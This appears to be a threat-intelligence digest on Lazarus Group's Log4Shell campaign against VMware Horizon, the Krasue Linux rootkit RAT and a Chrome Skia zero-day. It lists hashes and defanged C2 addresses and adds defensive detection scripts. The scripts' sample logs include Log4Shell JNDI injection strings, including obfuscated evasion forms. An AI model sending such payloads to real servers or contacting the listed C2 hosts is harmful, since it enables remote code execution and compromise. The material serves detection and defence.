North Korea’s Lazarus Group’s DLang-Based RAT Targeting VMWare Horizon Servers via Log4j

SUMMARY

The Lazarus Group (North Korea) continues to exploit the Log4Shell vulnerability (CVE-2021-44228), now as the entry point for deploying three malware families written in the D programming language (DLang).

TECHNICAL DETAILS

Cisco Talos identified several attacks that exploited Log4Shell against publicly exposed VMware Horizon servers still running a Log4j version vulnerable to remote code execution (RCE).  Talos named the campaign “Operation Blacksmith”; it uncovered two new remote access trojans (RATs), NineRAT and DLRAT, along with a malware downloader named BottomLoader, and also observed HazyLoad, a custom proxy tool whose hash is included in the indicators below.  A noteworthy shift in Lazarus’ tactics is the uncommon choice of the D programming language for these strains, possibly to evade detection and analysis tooling tuned to more common languages:

  • NineRAT uses the Telegram API as its command-and-control (C2) channel, receiving commands and exfiltrating files from compromised systems.
  • DLRAT is both a trojan and a downloader; it begins by collecting system information and sending it to its C2 server, then executes commands and retrieves further payloads.
  • BottomLoader fetches and executes payloads using PowerShell, establishes persistence, and can exfiltrate files.

Talos also assessed that Lazarus may share collected victim data with other APT groups or clusters under its umbrella, based on observed “re-fingerprinting” of systems that had already been compromised.

INDICATORS OF COMPROMISE

SHA256:

HazyLoad

  • 000752074544950ae9020a35ccd77de277f1cd5026b4b9559279dc3b86965eee

NineRAT

  • 534f5612954db99c86baa67ef51a3ad88bc21735bce7bb591afa8a4317c35433
  • ba8cd92cc059232203bcadee260ddbae273fc4c89b18424974955607476982c4
  • 47e017b40d418374c0889e4d22aa48633b1d41b16b61b1f2897a39112a435d30
  • f91188d23b14526676706a5c9ead05c1a91ea0b9d6ac902623bc565e1c200a59
  • 5b02fc3cfb5d74c09cab724b5b54c53a7c07e5766bffe5b1adf782c9e86a8541
  • 82d4a0fef550af4f01a07041c16d851f262d859a3352475c62630e2c16a21def

BottomLoader

  • 0e416e3cc1673d8fc3e7b2469e491c005152b9328515ea9bbd7cf96f1d23a99f

DLRAT

  • e615ea30dd37644526060689544c1a1d263b6bb77fe3084aa7883669c1fde12f
  • 9a48357c06758217b3a99cdf4ab83263c04bdea98c347dd14b254cab6c81b13a

Domains, IPv4 addresses and URLs:

  • tech[.]micrsofts[.]com
  • tech[.]micrsofts[.]tech
  • 27[.]102[.]113[.]93
  • 185[.]29[.]8[.]53
  • 155[.]94[.]208[.]209
  • 162[.]19[.]71[.]175
  • 201[.]77[.]179[.]66
  • hxxp[://]27[.]102[.]113[.]93/inet[.]txt
  • hxxp[://]162[.]19[.]71[.]175:7443/sonic/bottom[.]gif
  • hxxp[://]201[.]77[.]179[.]66:8082/img/lndex[.]php
  • hxxp[://]201[.]77[.]179[.]66:8082/img/images/header/B691646991EBAEEC[.]gif
  • hxxp[://]201[.]77[.]179[.]66:8082/img/images/header/7AEBC320998FD5E5[.]gif
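The indicators above are defanged ("[.]", "hxxp") and cannot be grepped for as written, and the Log4Shell payloads that deliver this malware are commonly obfuscated so that a naive search for "${jndi:" misses them. The script below is an added example, not code from Talos or from the original advisory: it refangs the listed network indicators, then sweeps log lines for both those indicators and JNDI lookup strings, collapsing the ${lower:j}ndi and ${::-j}ndi tricks before matching. The sample log lines are constructed for illustration and the JNDI callback address used in them (203.0.113.7) is a documentation address, not an indicator from the campaign.

```python
import re

# Defanged network indicators copied from the list above.
DEFANGED_IOCS = [
    "tech[.]micrsofts[.]com",
    "tech[.]micrsofts[.]tech",
    "27[.]102[.]113[.]93",
    "185[.]29[.]8[.]53",
    "155[.]94[.]208[.]209",
    "162[.]19[.]71[.]175",
    "201[.]77[.]179[.]66",
    "hxxp://27[.]102[.]113[.]93/inet[.]txt",
    "hxxp[://]162[.]19[.]71[.]175:7443/sonic/bottom[.]gif",
    "hxxp[://]201[.]77[.]179[.]66:8082/img/lndex[.]php",
    "hxxp[://]201[.]77[.]179[.]66:8082/img/images/header/B691646991EBAEEC[.]gif",
    "hxxp[://]201[.]77[.]179[.]66:8082/img/images/header/7AEBC320998FD5E5[.]gif",
]


def refang(ioc):
    """Undo the usual defanging conventions so an indicator can be matched against real logs."""
    s = ioc.strip().replace("[://]", "://").replace("[.]", ".").replace("(.)", ".")
    s = re.sub(r"^hxxps://", "https://", s)
    s = re.sub(r"^hxxp://", "http://", s)
    return s.lower()


# Boundary-aware patterns: "27.102.113.93" must not fire on "127.102.113.93".
IOC_PATTERNS = [
    (ioc, re.compile(r"(?<![\w.-])" + re.escape(ioc) + r"(?![\w.-])"))
    for ioc in sorted({refang(i) for i in DEFANGED_IOCS})
]

# Log4j lookup tricks used to evade naive "${jndi:" matching: ${lower:j}ndi, ${upper:J}ndi, ${::-j}ndi.
_CASE_LOOKUP = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{\s*:*\s*-\s*([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(?:ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:", re.IGNORECASE)


def normalize_lookups(text):
    """Collapse nested case/default-value lookups until the string stops changing."""
    prev = None
    while prev != text:
        prev = text
        text = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def scan_line(line):
    """Reasons a single log line is suspicious; an empty list means clean."""
    reasons = []
    if _JNDI.search(normalize_lookups(line)):
        reasons.append("log4shell-jndi-lookup")
    lowered = line.lower()
    for ioc, pattern in IOC_PATTERNS:
        if pattern.search(lowered):
            reasons.append("ioc:" + ioc)
    return reasons


def scan_log(lines):
    """Scan an iterable of log lines; returns [(line_number, reasons)] for hits only."""
    hits = []
    for n, line in enumerate(lines, start=1):
        reasons = scan_line(line)
        if reasons:
            hits.append((n, reasons))
    return hits


# Constructed sample lines (not real captures): three web-access-log entries and two proxy entries.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2023:09:00:01 +0000] "GET /portal/webclient/index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2023:09:00:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '203.0.113.7 - - [10/Dec/2023:09:00:03 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}${::-n}di:${lower:rmi}://203.0.113.7:1099/x}"',
    "proxy 10.0.0.5 CONNECT tech.micrsofts.tech:443 allowed",
    "proxy 10.0.0.5 GET http://162.19.71.175:7443/sonic/bottom.gif allowed",
]

if __name__ == "__main__":
    import sys
    source = open(sys.argv[1], errors="replace") if len(sys.argv) > 1 else SAMPLE_LOG
    for n, reasons in scan_log(source):
        print(f"line {n}: {', '.join(reasons)}")
```

Run it with a Horizon or reverse-proxy access log as the first argument, or with no argument to see it fire on the constructed sample. The normalizer only handles the case and default-value lookups; other Log4j lookup forms (for example ${env:...} chains) are not collapsed, so treat a miss as "not seen by this script" rather than "clean". The SHA256 hashes listed above are matched separately by hashing files on disk, which this script does not do.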

RECOMMENDATIONS

  • Urgently patch Log4j on all internet-facing VMware Horizon servers by applying VMware's Horizon updates (or the vendor's documented workaround), and verify the installed Log4j version afterwards rather than assuming the fix is in place.
  • Segment the network so that Horizon servers are isolated from unnecessary exposure and cannot reach critical internal systems directly; restrict their outbound connections as well, since every family described here depends on reaching an external C2 (note that NineRAT's C2 rides the legitimate Telegram API, so domain-reputation blocking alone will not catch it).
  • Review and reinforce access controls so that only authorized personnel can reach critical systems, applying the principle of least privilege to limit what a compromised Horizon server can do.
  • Deploy endpoint protection on the Horizon servers themselves to block execution of the malware described in this advisory.
  • Use web scanning tools to block access to malicious sites and to identify malware commonly delivered in such attacks.
  • Deploy email security that blocks malicious messages threat actors may use as part of their campaigns.
  • Use firewall appliances capable of detecting and mitigating activity associated with emerging threats, including the indicators listed above.
  • Use malware analytics tools to identify malicious binaries (the SHA256 hashes above can be seeded into them) and integrate the results across your infrastructure.
  • Secure your internet gateway to block connections to the listed malicious domains, IPs and URLs regardless of user location.
  • Automate web security so that potentially harmful sites are blocked and suspicious sites are assessed before users reach them.
  • Tune these measures to your own environment and threat data rather than relying on default policies alone.
  • Implement multi-factor authentication so that only authorized users gain network access.

Krasue RAT Linux Malware

SUMMARY

Krasue is a remote access trojan (RAT) for Linux that has been used against telecommunications companies in Thailand.  It was identified by security researchers at Group-IB and has evaded detection since at least 2021.  Analysis of the Krasue binary found seven embedded variants of a rootkit, each built for a different Linux kernel version, and the RAT appears to be assembled from code borrowed from three open-source projects.

TECHNICAL DETAILS

Group-IB's analysis describes Krasue's primary function as maintaining persistent access to the infected host.  That persistence suggests it may be deployed as part of a botnet or sold on by initial access brokers to threat actors looking for specific targets.  The distribution method remains unclear; plausible vectors include exploiting vulnerabilities, brute-forcing credentials, or masquerading as a legitimate product downloaded from untrusted sources.  Krasue's targeting appears to be concentrated on telecommunications companies in Thailand.

Group-IB’s analysis of the rootkit embedded within the Krasue binary found that it operates as a Linux Kernel Module (LKM), presenting itself as an unsigned VMware driver and therefore running at the same privilege level as the kernel itself. Its compatibility with Linux kernel versions 2.6.x and 3.10.x lets it go undetected on older Linux servers, where Endpoint Detection and Response coverage is typically limited. All seven embedded rootkit variants share the same system call and function call hooking capabilities.  Examination of the code found that Krasue is derived from three open-source LKM rootkits, Diamorphine, Suterusu and Rooty, all of which have been publicly available since at least 2017.

Krasue's capabilities include port hiding, process invisibility, granting root privileges, killing any process by ID, and concealing malware-related files and directories.  When communicating with its command and control (C2) server, Krasue responds to commands covering ping responses, master configuration settings, information retrieval, process restart and respawn, and self-termination.

Group-IB’s investigation found nine distinct C2 IP addresses hardcoded into the malware, and C2 communication takes place over port 554, the port normally associated with Real Time Streaming Protocol (RTSP) connections.  The use of RTSP-style traffic for C2 is a distinctive characteristic of Krasue’s behavior.

Krasue’s origin is still unclear, but researchers have observed overlaps with the XorDdos Linux malware, suggesting a common author or operator, or at least that the Krasue developer had access to XorDdos source code.
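The three observable traits described above (an unsigned LKM posing as a VMware driver, a module that hides itself from the kernel's module list, and C2 over port 554) translate into three cheap host-side checks. The script below is an added example, not Group-IB's tooling or code from the Krasue report; the module name vmware_drv, the process name vmware_helper and all of the sample /proc, dmesg and ss output are constructed for illustration.

```python
import os
import re
import subprocess


def parse_proc_modules(text):
    """Module names from /proc/modules (the list that lsmod displays)."""
    return {line.split()[0] for line in text.splitlines() if line.strip()}


def parse_kallsyms_modules(text):
    """Module names from /proc/kallsyms, where symbols owned by a module carry a trailing [name]."""
    return set(re.findall(r"\[(\w+)\]\s*$", text, re.MULTILINE))


def hidden_modules(proc_modules_text, kallsyms_text, loaded_sysfs_names):
    """Modules that have symbols in kallsyms or a loaded-module directory in sysfs but are
    missing from /proc/modules. A Diamorphine-style rootkit unlinks itself from the kernel's
    module list, which is what makes it vanish from /proc/modules and lsmod, while the other
    two views may still carry traces of it."""
    listed = parse_proc_modules(proc_modules_text)
    elsewhere = parse_kallsyms_modules(kallsyms_text) | set(loaded_sysfs_names)
    return sorted(elsewhere - listed)


def unsigned_module_events(dmesg_text):
    """Kernel log lines recording that a module was loaded without a valid signature."""
    return [l for l in dmesg_text.splitlines() if "module verification failed" in l]


def port554_connections(ss_text, allowed_programs=("vlc", "ffmpeg", "gst-launch-1.0")):
    """Established connections to a remote port 554 (RTSP) from `ss -ntp` output, with the
    owning process, excluding programs that legitimately speak RTSP."""
    hits = []
    for line in ss_text.splitlines()[1:]:  # first line is the column header
        fields = line.split()
        if len(fields) < 5 or not fields[4].endswith(":554"):
            continue
        m = re.search(r'users:\(\("([^"]+)",pid=(\d+)', line)
        prog, pid = (m.group(1), int(m.group(2))) if m else ("?", -1)
        if prog in allowed_programs:
            continue
        hits.append((prog, pid, fields[3], fields[4]))
    return hits


def triage_live_host():
    """Run the three checks against the local machine (Linux only; dmesg may require root)."""
    with open("/proc/modules") as f:
        proc_modules = f.read()
    with open("/proc/kallsyms") as f:
        kallsyms = f.read()
    # Only loadable modules have an initstate file; built-in code also appears under /sys/module.
    sysfs = [d for d in os.listdir("/sys/module") if os.path.exists(f"/sys/module/{d}/initstate")]
    dmesg = subprocess.run(["dmesg"], capture_output=True, text=True).stdout
    ss = subprocess.run(["ss", "-ntp"], capture_output=True, text=True).stdout
    return {
        "hidden_modules": hidden_modules(proc_modules, kallsyms, sysfs),
        "unsigned_modules": unsigned_module_events(dmesg),
        "port554": port554_connections(ss),
    }


# Constructed sample data (not from a real infection). "vmware_drv" and "vmware_helper" are
# hypothetical names standing in for a rootkit posing as a VMware driver and its userland RAT.
PROC_MODULES = """xfs 1234567 2 - Live 0xffffffffc05a0000
libcrc32c 12644 1 xfs, Live 0xffffffffc0590000
"""
KALLSYMS = """ffffffffc05a1000 t xfs_alloc_fix_len\t[xfs]
ffffffffc0590000 t crc32c\t[libcrc32c]
ffffffffc0600000 t hacked_getdents64\t[vmware_drv]
ffffffffc0600400 t hacked_kill\t[vmware_drv]
ffffffff81000000 T _stext
"""
SYSFS_LOADED = ["xfs", "libcrc32c", "vmware_drv"]
DMESG = """[    0.000000] Linux version 3.10.0 ...
[  123.456789] vmware_drv: loading out-of-tree module taints kernel.
[  123.457001] vmware_drv: module verification failed: signature and/or required key missing - tainting kernel
"""
SS = """State  Recv-Q Send-Q Local Address:Port   Peer Address:Port  Process
ESTAB  0      0      10.0.0.12:41234      192.0.2.10:554     users:(("vmware_helper",pid=1337,fd=5))
ESTAB  0      0      10.0.0.12:41235      192.0.2.20:443     users:(("curl",pid=1400,fd=3))
ESTAB  0      0      10.0.0.12:41236      198.51.100.5:554   users:(("vlc",pid=2001,fd=9))
"""

if __name__ == "__main__":
    print("hidden modules:", hidden_modules(PROC_MODULES, KALLSYMS, SYSFS_LOADED))
    print("unsigned module loads:", unsigned_module_events(DMESG))
    print("port 554 connections:", port554_connections(SS))
```

These are live-host heuristics, and a rootkit that hooks getdents and the read path can filter /proc/kallsyms and /sys/module as easily as it filters the module list, so a clean result from triage_live_host() is weaker evidence than a hit. For a suspected compromise, acquire memory and run the same comparisons offline against the image; the port 554 check is best run from a network tap or flow records rather than from the host, where ss output can be tampered with.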

RECOMMENDATIONS

  • Review the indicators of compromise (IOCs) and YARA rules published by Group-IB and load them into your detection tooling; sharing findings with the wider community helps close the gap on a family that went unnoticed since 2021.
  • Monitor network traffic for unusual patterns, in particular outbound connections to port 554 from servers that have no reason to speak RTSP, since Krasue uses this port for C2.
  • Extend EDR coverage to older Linux servers (2.6.x and 3.10.x kernels), the gap that Krasue's rootkit is built to exploit.
  • Conduct regular security audits and keep patch management current so that known exploits cannot serve as the initial access vector.
  • Use behavioral analysis and anomaly detection to catch rootkit-style activity such as process invisibility, port hiding and unsigned kernel module loads.
  • Enforce multi-factor authentication (MFA) to blunt credential brute-force attacks, one of the suspected distribution avenues.
  • Educate users and administrators about the risk of installing software from untrusted sources, and obtain packages only from reputable repositories.

INDICATORS OF COMPROMISE

SHA256:

  • 902013bc59be545fb70407e8883717453fb423a7a7209e119f112ff6771e44cc
  • b6db6702ca85bc80599d7f1d8b1a9b6dd56a8e87c55fc831dc9c689e54b8205d
  • ed38a61a6b7af436120465d352baa4cdf4ed8f01a7db7245b6254353e52f818f
  • afbc79dfc4c7c4fd9b71b5fea23ef12adf0b84b1af22a993ecf91f3d829967a4
  • 97f08424b14594a5a39d214bb97823690f1086c78fd877558761afe0a032b772
  • 38ba7790697da0a736c80fd9a04731b8b0bac675cca065cfd42a56dde644e353
  • e0748b32d0569dfafef6a8ffd3259edc6785902e73434e4b914e68fea86e6632
  • 4428d7bd7ae613ff68d3b1b8e80d564e2f69208695f7ab6e5fdb6946cc46b5e1
  • c9552ba602d204571b9f98bd16f60b6f4534b3ad32b4fc8b3b4ab79f2bf371e5
  • 3e37c7b65c1e46b2eb132f98f65c711b4169c6caeeaecc799abbda122c0c4a59
  • 8a58dce7b57411441ac1fbff3062f5eb43a432304b2ba34ead60e9dd4dc94831

IP Address(es):

  • 199.226[.]11:554

Zero-Day: Google Chrome

SUMMARY

Google released security patches addressing seven Chrome browser vulnerabilities, one of which is a zero-day under active exploitation: CVE-2023-6345, a high-severity integer overflow in Skia, the open-source 2D graphics library Chrome uses for rendering.

VULNERABILITY DETAILS

Google shipped the fix for the zero-day as an immediate security update and stated that it is aware an exploit for CVE-2023-6345 exists in the wild.

The vulnerability is an integer overflow within the Skia open-source 2D graphics library; the potential impact ranges from a crash to arbitrary code execution.  Skia is the graphics engine for a range of products including ChromeOS, Android and Flutter.  Reported on November 24 by Google’s Threat Analysis Group (TAG), the vulnerability fits the pattern of TAG-discovered zero-days that have been exploited by state-sponsored hacking groups in espionage campaigns against notable individuals such as journalists and opposition politicians.

Users are strongly advised to upgrade to Chrome 119.0.6045.199/.200 for Windows and 119.0.6045.199 for macOS and Linux.  Users of Chromium-based browsers, including Microsoft Edge, Brave, Opera and Vivaldi, should apply the corresponding fixes as their vendors release them.

RECOMMENDATIONS

  • Users are strongly advised to update Chrome browsers to the latest versions (119.0.6045.199/.200 for Windows, 119.0.6045.199 for macOS and Linux).
  • Ensure all devices running Chrome are updated to the latest versions.
  • If using browsers like Microsoft Edge, Brave, Opera, or Vivaldi that are based on Chromium, stay informed about security updates for these browsers and apply them as they become available.

Unveiling the Blueprint for Robust Defense Against High-Profile Cybersecurity Breaches

Recent cyber attacks on casino operators Caesars Entertainment and MGM Resorts International have highlighted the vulnerabilities of major corporations to advanced and coordinated hacking efforts. How can organizations defend against the increasingly collaborative and sophisticated cyber threats highlighted in recent high-profile cybersecurity breaches?

Mike Saylor, Professor of Cybersecurity at The University of Texas at San Antonio, offers his expert insight on preventing high-profile cybersecurity breaches by emphasizing the crucial role of continuous monitoring and timely response in cybersecurity.

He states, “You can invest in all these different technologies and layers, but at the end of the day, if you’re not continuously monitoring it and capable of identifying, and responding to threats in a timely manner, you’re gonna get breached.”

Watch the video here: https://marketscale.com/industries/software-and-technology/how-to-prevent-high-profile-cybersecurity-breaches/